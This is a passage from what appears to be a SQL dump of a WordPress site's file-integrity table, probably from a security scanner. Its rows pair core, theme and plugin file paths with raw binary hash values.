a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('���#��D�/w���4�','wp-content/themes/newsmag/assets/vendors/fontawesome/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�����CCӊ�/','��f����/;�~nʿZ��\0�0�bJ돺��\\x','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E~��2\'o	�?�','�	UWt��\"\Z��;��|w�^	r\"�:[_cA�}','',0,'?'),('��qS]�&i�=žV�','wp-content/themes/advance/inc/admin/img/3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʰ�\r�b�\\��!~�Ap','�����|��7h�wP^���y��;0i/����','',0,'?'),('��jL*V�ʐ_��\Z�\\','wp-content/themes/enigma/css/font-awesome-4.7.0/less/variables.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?n�8����὞�n�','��� <mA;�u������F��C���?�\n','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\r��^��k���+)','�GY��<\Z�����\"B��v�Ԅ��2K9i��bQ','',0,'?'),('��ؘ�-�m4)}��	�','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�F疋��nA�^','�KJE(iLõN��5���KTc�B0$]�-}�۹','',0,'?'),('��f���Q�Ҧ��5Q','wp-content/themes/catch-responsive/css/jquery.sidr.light.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�̖.,LuM���6','\\e	���v	E��=뒐��a\0`*��HR`�FI�','',0,'?'),('��2&�_s%D����','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/generic.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':X@P�rK\Zh��3=e_','5K�X���gٱ�#$W���p+D����','',0,'?'),('���[�g�@2:<)�','wp-content/themes/auberge/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�����#�ƧK!<','�����D�V����}�TP�/�3���+7�5�]','',0,'?'),('�͞�B!-��>F��K�','wp-content/themes/quicksand/template-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','î��r������','D?3���xw@L�ѵ�_��[������o��','',0,'?'),('��ի(�~�@!��','wp-content/themes/catch-responsive/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�̓�RG,����Y`','�px/��q�\"����i]o3�Qf0p\0��','',0,'?'),('��7�{�x��/m�p��','wp-content/themes/quicksand/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mY��s&oB}g��','@�{]u^������0�E\"��ûz�(:�c%�','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r	','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('���Ь�p�I��YR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z����ħ7�	�7V\Z','�p���#4�o�p�p8�^�۰�^�F�+�ף�)l','',0,'?'),('�\"=��&�u�`~�`}�','wp-content/themes/skt-pathway/images/bq_bubble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\밿V�S�\n�����5','�	?h�a� ���׸��^ъ!��.RT(;','',0,'?'),('��l36�aTr����','wp-content/themes/graphene/images/social/vimeo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�[?3l�^+Gy*','EQ�F�v�hU�9D��3n9�--m|�ܦy\r�','',0,'?'),('�	/R͉�۩��\'[��','wp-content/themes/city-store/inc/customizer/css/customizer-control.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�5L5\"�0��9�','�w�\"3+��u~e�H��*�D\"�و�=x��','',0,'?'),('�(Њ�QB&����Q?�','wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�[sȥ��>JG�^�','��G5�K>�6��Fcf\n��&� �;�t��l','',0,'?'),('�A��n�*ww�_�]f�','wp-content/themes/simpleshift/parts/companion/frontpage-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�»;����Q�','}F��a�EWP�/����‚j16�0Xc5��/','',0,'?'),('�D����]�|߼�$�','wp-includes/js/mediaelement/wp-mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(D�q�|�����','P�E+#��M�s;agL���e��S�MN��r=','',0,'?'),('�Ph�����rV�','wp-admin/css/revisions-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɲ����L�$�.\ZDΦ','�9Ps2�@N2��L��@F/�T��f��4�R','',0,'?'),('�Pw��\nz���80|�]','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/rulers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OrN�O�-r@JO�V�','�\\QHs����]���Ch	\"J�`�3��*�','',0,'?'),('�P��]D��\'�-�<b','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-number-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y-���~��I�q�s�','�I&��\n$��E:��N��r�t�\ZK(o\rͰ}��','',0,'?'),('�W��iQ^S��� ���','wp-content/themes/weblog/acmethemes/customizer/options/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�_�X�qef�j<',']�ObiЅ^��~��\"�\'ՠOE���WH','',0,'?'),('�c	�[�c�5Of<�pN','wp-content/themes/gambit/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{I6\"2A�d���','�vi�өٱ�X�nd��kR{#���Wz�x�T�','',0,'?'),('�f���\\�ZH��	,�5','wp-content/themes/graphene/loop-author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�g��WNޙ^�',',U�1(��-7a�NC4بH�$8C�ʀ��GxI','',0,'?'),('�f��@Ts�;��\0r��','wp-content/themes/skt-pathway/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�f;�t:S}��5��L','��.�׸�+u�ά;���៝���\r�','',0,'?'),('�r�+���\0V��QAg�','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-fonts-google.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\05���J����X���','�>&�uS��ťv+�H�v\\~�0���([N|�hp','',0,'?'),('�v�S<\']@1���W','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f/j�DF�)���Er','\Z�V-%F��^�#d8׍(��ODZ�P]�','',0,'?'),('��`�!��ŏ��3`�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qd�B\\�*ض���','n�Z�/ļ���.3Е���+�w�\'*��`��','',0,'?'),('�����W���~��','wp-content/themes/skt-pathway/css/navigation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*k������?U@t2�','���p�����V?\\CI\'ւ�ECn�X\05\"','',0,'?'),('�����]Ɇ�q����N','wp-content/themes/brickyard/js/scroll-to-top.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Sp��7R��','x�c�1����^��ѕ#f�f�\\Pa�:F��<`','',0,'?'),('�������t�AA~q��','wp-content/themes/auberge/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t��4R�l���Z6','\0������NC|����ȷl%�AθI:�}_?','',0,'?'),('���<�mu7DS\'J','wp-content/themes/graduate/tp-education/tp-archive-excursion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@e��ET2hgo�','p���A�hߍ�߹J�l\r����r���-/�}\'��','',0,'?'),('������\"=�\'Ե','wp-content/themes/catch-flames/js/jquery.cycle/jquery.cycle2.flip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_˳�d<\"�>4y�`','i6l2��:��}�\"r��s��7�	k�2','',0,'?'),('����Fq�f�G�}�n�','wp-content/themes/saybusiness/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','17<�u\rf�s	��eb(�','�a@~���%}�Z��H�\'�}�k\rt+���81','',0,'?'),('���\r���u�-��ݽ','wp-content/themes/exoplanet/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dc�se{/�2�Vk��','��P4�I^��ُ�q�J��T�.�d:��(��S�','',0,'?'),('��P��#Z�\nl���','wp-content/themes/hitmag/inc/kirki/assets/js/functions/notifications.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c#�3kÞZT;�N','bef��<�\njX��5HHmM0�������⨺','',0,'?'),('��2]&֔#���^F�q�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2΢�	�/�E!�<s�','\\�=���5��3	�ώv��_%�2��A�?$','',0,'?'),('���S�K5�47��S','wp-includes/css/dist/block-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RV�0 ���*��','|�ߪYZa3=?\ZK�`��� ��+��-���','',0,'?'),('����\Z\\Z,��=�;�','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-radio-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i8ɬ��ϋcB��N','L��9!�\\w�9�DW{���Mֆ�31Lzq1','',0,'?'),('��*�*h�<�r�*��','wp-content/themes/catch-responsive/js/source/catchresponsive-metabox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I4��M_�Pӟ��fA�','��eBs\rl\\��zW�@��h&��w���\0��','',0,'?'),('��4��� \\\Z/]��\0�','wp-content/themes/quicksand/js/lightgallery/js/lightgallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\Zː�|D�т���','�MB6���O��H�A%`���*��4��K��D','',0,'?'),('��2\r1\'�%��L^','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���=H�(!�-y�','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('��O �&�ms�>bI��','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-date-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��\Zv�ٮ=V�nEL�','A<O�Q2��J�3�p�5�JMi�c� {<Χ','',0,'?'),('�����+f6Q�y9','wp-includes/js/jquery/ui/selectmenu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('��嶈�G�^�g���','wp-content/themes/newsmag/assets/sass/modules/_news-ticker.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ض�pN9�k�R�','��0,\ZG�HHDTŰ���!���B^=�W','',0,'?'),('���\Z0��~�\\�\\D�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/checkbox-multiple.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�ؤ�@ī1T�ޔ','S*��U�y$�ПQy�RUPG\"Y��%�,�Hc�� ','',0,'?'),('�͑���;3���.','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\'���1�+�4��','�콲�o��5�~F뷘�\Z���Q�K,R��(','',0,'?'),('�])��	���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�)P�6Kw4��p}_`W','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-active-callback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�s�bn�M�O�fT~l','�HS�V&i�\0{�F๲A�X��6�<��$��_?','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۴iN��fF�=w�','A35(Lt/������v_��#UV猌����M','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('�3������9`w�q','wp-content/themes/twentynineteen/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2;9���K�K�\'��!','���5.\0��$�V�u�aˆ��+EI�H�h{ �\'','',0,'?'),('�6*uA�H�Hh�.Q�','wp-content/themes/advance/css/foundation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2̵���$��W��`(h','���%��Ϊ��W��J�Ϛ�{���7�7�T`?@]','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;_Ǡ8Є��=�','\0ҧ]W���	�M�o�5m�d�p�Hb#�Wp�M\'','',0,'?'),('�FV�r�8p\"���w/	','wp-content/themes/saybusiness/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�c݄�W���Q�<�','\"���lK�F�)���!�r�A�4<!RA�˟��','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�q_=�s9�N�@ũ�','(�R�ƒQ�c�4o{]�����R��RZW','',0,'?'),('�Q���F3ʐ��X��','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m^\\I�]�)�#���','�]�G�_3c����[���=�\Z�/�%1&','',0,'?'),('�]	���n_�ˤ[l���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�y?>�F�\n~^�','Z��\n�\r�~YW�m���U����9Ft�Q��','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v,d��,��ȁ��','�-(wE��Cg�E��u���\"�u�7������','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l�(�� \r$','W��W�B�/hfq!�r|�{z`-+k�D�','',0,'?'),('�}�\Z��F?�Fs�v��#','wp-content/themes/twentynineteen/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','42�����r!�j����','�.\\��J�� ��TC~0���=�/�����','',0,'?'),('�,5X��{�e�','wp-content/plugins/wordfence/js/wfpopover.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('���1H�j}��9\\','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/bin/lint',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IﳡG�g�V�A�Jִ','�4}����Z2�!�|~T#�z�)�4!����&AQE�','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��|M�S�p`gK~�','e�^��\'a;H�%	V�<�e5iXT\n܎~T�','',0,'?'),('��A�@�D�(\"�-�','wp-content/themes/university-hub/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|���0�s�i�-','���89қ6��R������ui���*�I','',0,'?'),('���Yz�<������l','wp-content/themes/city-store/assets/sticky/jquery.sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�68��j�	����','L��\n��Ne�d\rO��)���q�M�\r�wX�','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��M��6o��^8ǃ�','wp-content/themes/enigma/core/admin/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�j5��ć-/�','iH=Eb�ޥ�r�H��9��|�^�m�k�8P','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��Ee�2��V�����','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/dimension.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˌ�T�&�!:����h','%�\'���v�u���[�� ʁ����#��i=�','',0,'?'),('��V�YRi�&�+��쟨','wp-content/themes/simpleshift/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�9���\n.�/����','�|��Mw��r���~�<���b%�0F͋>��','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('���=Vm~��C�\Z','wp-content/themes/university-hub/inc/customizer/control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�4�mb~E{','�0����{�?�aI�W/à_`�e�9G�:�2','',0,'?'),('������4�K9?\'҆','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�tŽ�Ћj��?�','�Gc3I��>έ��j�����_/*�D�','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��TQ�)r�J��^���','߁ۤ������a�?�g.E<�ҟ�\"N6��Ed','',0,'?'),('���[�3dө��5����','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/haml/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԝq>g�N���Wu�','��q�4\'�o���i1\0ܱ.�&��@�@��M	|','',0,'?'),('��\\�}���e��mH\'�','wp-content/themes/twentynineteen/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q5צ�O/�J�N','\r}p\'qD%�<}��&��-#=s_Oa��6��{','',0,'?'),('�؀��Ka\0�>���\\','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/previewer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��֡�\rC\\���_}Ѵ�','Wfs�3��O���e��/�`ͩ�,�t�p�','',0,'?'),('��I>X�VMD3f;�6�','wp-content/themes/singularity/template-parts/headers/top-bar-centered.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۖH�,z�\r�8�$8�','<!W�E�gM?9���B���ޛn�bF����','',0,'?'),('��.�\rŚM�&��/�\'','wp-content/themes/quicksand/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�PS�\'��Z5�Z}��','���qa#T0��T�n=���8X\n�Bg%΀L�','',0,'?'),('�	�~�����\\2CN`>�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c2\naNw2���qG�','�1��+kI_Ԁޘ���#O�C6�\n�c��','',0,'?'),('�\n���f��s\r�\"�P','wp-content/themes/graphene/images/social/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��;�m��i�x��','(e\'O3��HZ�R�0�Uؤ�h?Ȟ+F�Wϣ	�*','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�<yjܲ���d����','wp-content/themes/metro-magazine/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʏ�A1��1���|s','���v�#�k�b���� �>�)i.8�9�O�]','',0,'?'),('�E�(Lj8&΃�.���','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/xml/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��YVЌ,�ؚ>\0-','�1��\\��cG#&L(,bض��y��׀xl','',0,'?'),('�G���!#h�9	��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��b�엽+����','C��8߿����D��%��6.�E�.;�.�	�ח','',0,'?'),('�\\����3\0h]??�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��&\'��\rv�z','��ɘ���@����l��+X����SZjǛa�','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�b��=�i�PC��Ix','wp-content/themes/saybusiness/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Q��y*�7vսF�W','�)��eHq�^�ғ-B�����r��@�','',0,'?'),('�l��|��.2�z�<x','wp-content/plugins/wp-cerber/assets/flags/np.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǭ�|�]���#(','Շ�\n�D$	����\n�VFv�ʸ��_�K~\\','',0,'?'),('�q|�o�TPg?%w�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/sass/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��S���ν�8���','�u~��sC�&�f�H�:�/�X̱L�����]M�','',0,'?'),('�us�T­B��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('�|��MW���j(�޻','wp-content/themes/twentytwentyone/assets/js/polyfills.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���W�\\�.��A .','��b�D���Z�	6A��m�wl�r�E��0��','',0,'?'),('�}����lU_$�g�','wp-content/themes/enigma/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BUPV,}9�_Y&�9','J\ZU-ߢprST�e���J�w�o�Y�-�K','',0,'?'),('��|#i��ʚ�����','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/dashicons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yrK�{�J��mf�Q��','畦��A\'!���K��rN�2����u�v.�d','',0,'?'),('��Xo���7����<���','wp-content/themes/brickyard/functions/about/images/li_fm.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}7��7�+���','f�MckO?�Y�s�h�0���G��V����','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('��~�5#|^�#mn�','wp-content/themes/simpleshift/inc/kirki/assets/css/transparency-grid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[^��Q�Ǫ\r:;�5','��˝?��#�O	��C�M���\\�\n�\0VY','',0,'?'),('��E�wy.�*_\\)�>�v','wp-content/themes/catch-responsive/js/source/jquery.sidr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�``\ZZj���,��','���u/���s����$\r���Ua�J��\Z','',0,'?'),('���=�����_VI�','wp-content/themes/advance/inc/kirki/assets/js/controls/toggle.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v+��$����%�','����9�MXF��kB�?�u�L�!���b��@','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{�	\n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('��0^6��S\'c�','wp-content/themes/catch-flames/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@n���	1��N�\'2GJ','�ݞ]�={��c	i���B���Q�\"/FE񘣂','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','?	��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('��s|��\'��o�f�d�','wp-content/themes/graphene/images/social/piano.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��A}!\"g�~��','���Y}��X��\'j�J4������g�BO','',0,'?'),('��F�	�}͝cJnL�','wp-content/themes/exoplanet/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�:�p�8F����','�T��8.*t#eϬc\rJu3�[.Vڀ����a��Q|','',0,'?'),('�#Uȥbh���3U�','wp-content/themes/hitmag/inc/kirki/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����K��